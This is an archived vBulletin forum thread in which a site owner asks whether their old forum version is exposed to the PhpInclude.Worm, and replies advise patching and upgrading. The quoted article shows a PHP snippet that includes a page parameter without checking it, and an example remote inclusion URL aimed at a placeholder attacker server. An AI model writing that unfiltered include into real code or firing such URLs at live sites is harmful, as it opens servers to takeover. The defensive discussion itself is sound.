The Arcive of Official vBulletin Modifications Site.It is not a VB3 engine, just a parsed copy! |
|
#1
|
|||
|
|||
PHP worm?
I was informed by my host there is a PHP worm out there...do you have an update or is Vbulltein alrwady secure for it? I run version 2.3.0
this is a copy of the email I got..any help would be appreicated. There is a worm using Google to look for insecure PHP pages. The worm will exploit the PHP pages and take over your site ranging from web site defacement to deletion of files. The problem relates to insecure PHP coding using the followng items: include() require() mail() upload --------- From the article: The new worm PhpInclude.Worm is currently propagated on Internet, it attacks any nonprotected dynamic page. [ This worm is detected by certain antivirus as being an alternative of Santy. We estimate that this worm is completely different from the Santy family, we thus decided to allot alias generic "the PhpInclude.Worm to him" ]. Contrary to Santy, PhpInclude.Worm does not exploit the vulnerabilities phpBB, it exploits a broader pallet of faults known as "of programming". It seeks (via Google/Yahoo/AOL) Web servers whose php pages use the functions "include()" and" require()"in a not-protected way. How? These functions are normally used by the programmers in order to include Web pages specified in arguments. Unfortunately, nonthe checking of these arguments can allow the inclusion and the execution of external files, and thus the compromising of the Web server: Example: vulnerable.php if(isset($page)) { include($page); } ----------------------------------------------- The page above correctly does not filter the variable $$page, it thus allows inclusion then the execution of distant arbitrary scripts: vulnerable.php?page=http://server_pirate/scriptmalicieux?cmd=commandes_malicieuses PhpInclude.Worm thus seeks pages of the type "* php?*=", then tries to insert various orders there allowing the installation of robots IRC and the constitution of an army of machines zombies. -- |
#2
|
||||
|
||||
Please read this important announcement about a security issue with your version of vB:
http://www.vbulletin.com/forum/showt...180#post694180 It is not related to the PHP worm, but this does need to be patched. I strongly recommend upgrading to at least 2.3.5 ASAP. Please read this announcement concerning the phpBB worm and your vBulletin forums: http://www.vbulletin.com/forum/showthread.php?t=124008 |
#3
|
|||
|
|||
i don't understand why you don't just upgrade to 3.0.3?
|
|
|
X vBulletin 3.8.12 by vBS Debug Information | |
---|---|
|
|
More Information | |
Template Usage:
Phrase Groups Available:
|
Included Files:
Hooks Called:
|